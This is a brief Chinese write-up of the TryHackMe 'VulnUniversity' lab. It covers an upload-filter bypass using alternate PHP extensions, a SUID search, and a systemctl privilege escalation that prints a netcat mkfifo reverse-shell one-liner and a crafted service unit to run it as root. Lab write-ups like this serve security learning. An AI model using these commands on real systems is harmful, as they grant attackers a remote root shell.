Try Hack Me::VulnUniversity

时间：2021-02-05 15:14:18 阅读：38 评论：0 收藏：0 [点我收藏+]

0x00 摘要

该靶机属于入门级别的靶机，仅记录粗略过程及提权细节。

0x01 Task 2-4

考察了nmap、gobuster的使用。
在上传php文件时可尝试通过php3，php4，php5，phtml进行绕过。
技术分享图片

0x02 systemctl提权

教程提示通过如下命令查看服务的权限信息：

Use the command: find / -user root -perm -4000 -exec ls -ldb {} ;

技术分享图片

该命令不是很好用，通常使用linpeas.sh进行枚举。

systemctl提权参考
https://medium.com/@klockw3rk/privilege-escalation-leveraging-misconfigured-systemctl-permissions-bc62b0b28d49

www-data@vulnuniversity:/tmp$ echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc ip port >/tmp/f" > /tmp/shell.sh
www-data@vulnuniversity:/tmp$ TF=$(mktemp).service
www-data@vulnuniversity:/tmp$ echo ‘[Service]
> Type=oneshot
> ExecStart=/bin/sh -c "bash /tmp/shell.sh"
> [Install]
> WantedBy=multi-user.target‘ > $TF
www-data@vulnuniversity:/tmp$ /bin/systemctl link $TF
www-data@vulnuniversity:/tmp$ /bin/systemctl enable --now $TF

技术分享图片

Try Hack Me::VulnUniversity

原文：https://www.cnblogs.com/aya82/p/14377383.html

踩

(0)

评论一句话评论（0）

分享档案

更多>

2021年09月23日 (328)
2021年09月24日 (313)
2021年09月17日 (191)
2021年09月15日 (369)
2021年09月16日 (411)
2021年09月13日 (439)
2021年09月11日 (398)
2021年09月12日 (393)
2021年09月10日 (160)
2021年09月08日 (222)